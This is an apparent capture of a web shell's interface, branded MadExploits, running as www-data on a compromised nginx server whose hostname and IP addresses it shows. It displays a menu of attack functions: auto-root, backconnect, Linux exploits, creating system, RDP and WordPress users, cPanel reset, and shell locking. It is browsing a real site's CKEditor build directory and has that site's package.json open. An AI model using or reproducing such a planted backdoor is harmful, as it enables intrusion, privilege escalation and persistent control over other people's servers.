Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdg.amatya.biz-8 /
public /
ckeditor5 /
[ HOME SHELL ]
Name
Size
Permission
Action
build
[ DIR ]
drwxrwxr-x
sample
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
.DS_Store
6
KB
-rw-rw-r--
LICENSE.md
2.12
KB
-rw-rw-r--
README.md
3.41
KB
-rw-rw-r--
package.json
2.08
KB
-rw-rw-r--
webpack.config.js
2.07
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "ckeditor5-custom-build", "author": "CKSource", "description": "A custom CKEditor 5 build made by the CKEditor 5 online builder.", "version": "0.0.1", "license": "SEE LICENSE IN LICENSE.md", "private": true, "main": "./build/ckeditor.js", "devDependencies": { "@ckeditor/ckeditor5-adapter-ckfinder": "^33.0.0", "@ckeditor/ckeditor5-alignment": "^33.0.0", "@ckeditor/ckeditor5-autoformat": "^33.0.0", "@ckeditor/ckeditor5-autosave": "^33.0.0", "@ckeditor/ckeditor5-basic-styles": "^33.0.0", "@ckeditor/ckeditor5-block-quote": "^33.0.0", "@ckeditor/ckeditor5-cloud-services": "^33.0.0", "@ckeditor/ckeditor5-dev-utils": "^30.1.0", "@ckeditor/ckeditor5-dev-webpack-plugin": "^30.1.0", "@ckeditor/ckeditor5-editor-classic": "^33.0.0", "@ckeditor/ckeditor5-essentials": "^33.0.0", "@ckeditor/ckeditor5-find-and-replace": "^33.0.0", "@ckeditor/ckeditor5-font": "^33.0.0", "@ckeditor/ckeditor5-heading": "^33.0.0", "@ckeditor/ckeditor5-highlight": "^33.0.0", "@ckeditor/ckeditor5-horizontal-line": "^33.0.0", "@ckeditor/ckeditor5-html-support": "^33.0.0", "@ckeditor/ckeditor5-image": "^33.0.0", "@ckeditor/ckeditor5-indent": "^33.0.0", "@ckeditor/ckeditor5-link": "^33.0.0", "@ckeditor/ckeditor5-list": "^33.0.0", "@ckeditor/ckeditor5-media-embed": "^33.0.0", "@ckeditor/ckeditor5-page-break": "^33.0.0", "@ckeditor/ckeditor5-paragraph": "^33.0.0", "@ckeditor/ckeditor5-paste-from-office": "^33.0.0", "@ckeditor/ckeditor5-restricted-editing": "^33.0.0", "@ckeditor/ckeditor5-source-editing": "^33.0.0", "@ckeditor/ckeditor5-special-characters": "^33.0.0", "@ckeditor/ckeditor5-table": "^33.0.0", "@ckeditor/ckeditor5-theme-lark": "^33.0.0", "@ckeditor/ckeditor5-typing": "^33.0.0", "css-loader": "^5.2.7", "postcss": "^8.4.12", "postcss-loader": "^4.3.0", "raw-loader": "^4.0.2", "style-loader": "^2.0.0", "terser-webpack-plugin": "^4.2.3", "webpack": "^5.70.0", "webpack-cli": "^4.9.2" }, "scripts": { "build": "webpack --mode production" } }
Close